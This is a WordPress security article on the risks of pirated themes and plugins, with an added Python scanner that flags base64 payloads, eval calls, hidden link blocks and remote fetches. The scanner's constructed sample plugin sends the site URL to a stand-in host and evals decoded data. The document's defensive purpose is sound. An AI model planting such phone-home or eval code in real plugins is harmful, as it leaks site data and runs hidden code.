A WordPress website can’t work without plugins or themes. Well, you don’t strictly need plugins, but in most cases WordPress alone is not enough. Choosing, downloading and using themes and plugins may look like a simple task, but with the increased popularity of WordPress it no longer is.
Millions of websites run on WordPress, and that makes WordPress and everything related to it a great target for hackers, both to exploit existing security holes and to plant their own into plugins and themes. Every now and then you hear that some plugin is being used by hackers to get access to websites or to send users’ data to a remote server. Similar methods are used with themes. Themes are also used to plant spam links into the header and footer of websites using encoded content (base64 or some other method). Some themes have even carried malicious code that was able to replicate itself to other themes installed on the website.
Preventing something like that from happening to you is not very complicated; it only requires that you be careful about where you get your plugins and themes, and about what you are installing on your website.
Find and download themes and plugins
The best source for free themes and plugins is the main WordPress website (wordpress.org). Themes uploaded there are always scanned prior to publishing to make sure no malicious code is embedded. Where plugins in the repository are concerned, the review is nowhere near as strict as for themes, and plugins are removed only if multiple users report a plugin as problematic. Over the years, there have been cases of plugins uploaded to the repository that were malicious in nature, but they were always quickly removed. Still, the plugin repository needs a massive overhaul to bring it up to date (90% of plugins are not compatible with the latest WordPress versions; they are not maintained and they are not tested). But, as a source of free plugins, it is still the best way to get them.
If you don’t download plugins or themes from there, make sure to get them directly from their authors’ websites, and be careful about downloading them from any third-party website. Free plugins are not a big problem, but premium (or commercial, if you like) plugins and themes are the usual target of hackers: they obtain them illegally, modify them and offer them for free on their own websites, warez forums or other sources. All commercial theme developers have been affected over the years; their themes end up on such websites, and those copies always include some sort of malicious code.
Check what you have downloaded
Before you upload a theme or plugin to your website, test it on your local computer. You can also search the files of a theme or plugin for code that is potentially problematic. This is easier to do with a theme than with a plugin, since a plugin not only has more files, but there are also legitimate reasons for it to use some functions that may be considered problematic.
Any theme file can be affected, but the files most commonly infected are functions.php, footer.php and header.php. Encoded content is usually recognized by a call to the base64_decode function containing a long string that doesn’t make any sense on its own. Also, the footer or header can contain long lists of links that are displayed as hidden. There is a free plugin called Theme Authenticity Checker, and you can use it to scan the themes you have installed for malicious code or links that shouldn’t be there.
There are several ways that plugins and themes can send data to remote servers, and that can also be a big security concern, so check whether curl functions are used, or functions like wp_remote_get or file_get_contents. Checking for that requires that you be familiar with PHP and WordPress development.
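The two checks described above (long base64 strings fed to base64_decode and hidden link blocks in header/footer files, plus calls that reach remote servers such as curl, wp_remote_get or file_get_contents) can be turned into a quick heuristic scan of a theme or plugin directory. The script below is an added example written for this article; it is not code from the article, from WordPress or from the Theme Authenticity Checker plugin. The length threshold, the indicator names and the sample PHP files are constructed assumptions; example.invalid is a reserved hostname that never resolves.

```python
"""Heuristic scan of theme/plugin PHP files for the indicators named in the
article: long base64 literals passed to base64_decode, eval of decoded data,
hidden blocks full of links, and calls that contact remote servers.
Added example; thresholds and sample files are assumptions, not WordPress code."""
import re
import tempfile
from pathlib import Path

MIN_B64_LEN = 40  # assumption: legitimate theme code rarely inlines base64 this long

# Per-line indicators. Each hit yields a finding of the given kind.
_LINE_PATTERNS = [
    ("encoded_payload",
     re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{%d,})['\"]" % MIN_B64_LEN)),
    ("eval_of_encoded",
     re.compile(r"eval\s*\(\s*(?:[a-z0-9_]+\s*\(\s*)*(base64_decode|gzinflate|str_rot13)\s*\(")),
    ("remote_fetch",
     re.compile(r"\b(curl_init|curl_exec|wp_remote_get|wp_remote_post|wp_remote_request)\s*\(")),
    ("file_get_contents_url",
     re.compile(r"file_get_contents\s*\(\s*['\"]https?://")),
]
# Whole-file indicator: a display:none container that holds anchor tags.
_HIDDEN_BLOCK = re.compile(
    r"<(div|span|p)\b[^>]*display\s*:\s*none[^>]*>(.*?)</\1>", re.S | re.I)
_ANCHOR = re.compile(r"<a\s[^>]*href=", re.I)


def scan_source(source, name="<inline>"):
    """Return a list of findings (dicts) for the text of one PHP file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for kind, pattern in _LINE_PATTERNS:
            for match in pattern.finditer(line):
                findings.append({"file": name, "line": lineno, "kind": kind,
                                 "evidence": match.group(0)[:60]})
    for match in _HIDDEN_BLOCK.finditer(source):
        links = len(_ANCHOR.findall(match.group(2)))
        if links:
            lineno = source.count("\n", 0, match.start()) + 1
            findings.append({"file": name, "line": lineno, "kind": "hidden_links",
                             "evidence": "%d link(s) inside display:none block" % links})
    return findings


def scan_theme(theme_dir):
    """Scan every .php file below theme_dir (works for plugins as well)."""
    findings = []
    for path in sorted(Path(theme_dir).rglob("*.php")):
        findings.extend(scan_source(path.read_text(errors="replace"), path.name))
    return findings


# Constructed sample files (assumptions, not real theme code).
SAMPLE_CLEAN = """<?php
// ordinary footer with nothing suspicious
wp_footer();
echo esc_html(get_bloginfo('name'));
"""
SAMPLE_FOOTER = """<?php
// footer.php carrying an encoded payload and a hidden link block
echo base64_decode('PGEgaHJlZj0iaHR0cDovL2V4YW1wbGUuaW52YWxpZCI+c3BhbTwvYT4=');
?>
<div style="display:none"><a href="http://example.invalid/a">x</a><a href="http://example.invalid/b">y</a></div>
"""
SAMPLE_PLUGIN = """<?php
// plugin file that phones home and runs decoded code
add_action('init', 'my_plugin_init');
function my_plugin_init() {
    $resp = wp_remote_get('http://example.invalid/collect?u=' . home_url());
    $cfg = file_get_contents('http://example.invalid/config.txt');
    eval(gzinflate(base64_decode('H4sIAAAAAAAA')));
}
"""


def demo():
    """Write the constructed samples to a temp dir and scan it like a theme folder."""
    with tempfile.TemporaryDirectory() as tmp:
        for fname, text in (("clean.php", SAMPLE_CLEAN), ("footer.php", SAMPLE_FOOTER),
                            ("plugin.php", SAMPLE_PLUGIN)):
            (Path(tmp) / fname).write_text(text)
        return scan_theme(tmp)


if __name__ == "__main__":
    for f in demo():
        print("%s:%d %s  %s" % (f["file"], f["line"], f["kind"], f["evidence"]))
```

Point scan_theme at an unpacked theme or plugin folder before uploading it. A hit is a reason to open the file and read the surrounding code, not proof of malice: plugins have legitimate uses for wp_remote_get and file_get_contents, which is exactly why the article says judging plugin findings takes PHP and WordPress knowledge, while a long base64 literal or a display:none block of links in a theme's footer almost never has an innocent explanation.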
Be careful what you add to your website: make sure to get plugins and themes from their authors or from a reputable source like the official WordPress repository, and spend some time testing what you have downloaded.